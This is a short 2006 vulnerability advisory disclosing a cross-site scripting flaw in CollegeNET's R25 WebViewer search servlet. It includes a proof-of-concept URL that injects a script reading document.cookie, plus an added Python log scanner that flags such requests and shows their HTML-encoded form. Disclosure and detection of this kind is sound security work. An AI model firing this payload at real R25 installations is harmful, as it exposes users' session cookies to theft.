R25 XSS Vulnerability
=====================

Discovered By: Matthew Benenati
Release Date: 3/3/2006
Vendor: CollegeNET
Versions: <=3.2
Severity: Medium

About
-----
R25 delivers the first campus-wide class and event scheduling software to unify all users on a single database, provide a completely customizable environment for each, and tap the power of the Internet for mass communication and e-commerce revenue opportunities.

Example
-------
R25 WebViewer is susceptible to cross site scripting:

http:///wv3/wv3_servlet/urd/run/wv_event.QSearch?searchon=0,findby=1,criteria=%22%3C/div%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
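
For defenders reviewing web server logs, the following added example (not part of the original advisory or of CollegeNET's code) flags wv_event.QSearch requests whose decoded criteria value carries HTML markup characters, and shows the HTML-encoded form a fixed page would emit instead. It assumes Common Log Format access logs and comma-separated query fields as seen in the URL above; the log lines are constructed.

```python
import html
import re
from urllib.parse import urlsplit, unquote

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
MARKUP_CHARS = set('<>"\'')  # enough to leave an attribute or element context

# Constructed sample access-log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [03/Mar/2006:10:00:01 +0000] "GET /wv3/wv3_servlet/urd/run/'
    'wv_event.QSearch?searchon=0,findby=1,criteria=chemistry%20101 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [03/Mar/2006:10:00:07 +0000] "GET /wv3/wv3_servlet/urd/run/'
    'wv_event.QSearch?searchon=0,findby=1,criteria=%22%3C/div%3E%3Cscript%3E'
    'alert(document.cookie)%3C/script%3E HTTP/1.1" 200 5344',
]

def parse_qsearch(target):
    """Parse the comma-separated query string seen in the advisory's URL."""
    fields, last = {}, None
    for part in urlsplit(target).query.split(","):
        name, sep, value = part.partition("=")
        if sep and name.isalnum():
            fields[name] = unquote(value)
            last = name
        elif last is not None:
            # A comma inside a value: glue the fragment back onto the previous field.
            fields[last] += "," + unquote(part)
    return fields

def flag_requests(lines):
    """Return (line_no, decoded criteria, HTML-encoded form) for suspicious requests."""
    hits = []
    for line_no, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match or "wv_event.QSearch" not in match.group(1):
            continue
        criteria = parse_qsearch(match.group(1)).get("criteria", "")
        if MARKUP_CHARS & set(criteria):
            hits.append((line_no, criteria, html.escape(criteria, quote=True)))
    return hits

if __name__ == "__main__":
    for hit in flag_requests(SAMPLE_LOG):
        print(hit)
```

The third element of each hit is the same value after HTML encoding, which is what the search page should write into its markup rather than the raw criteria string.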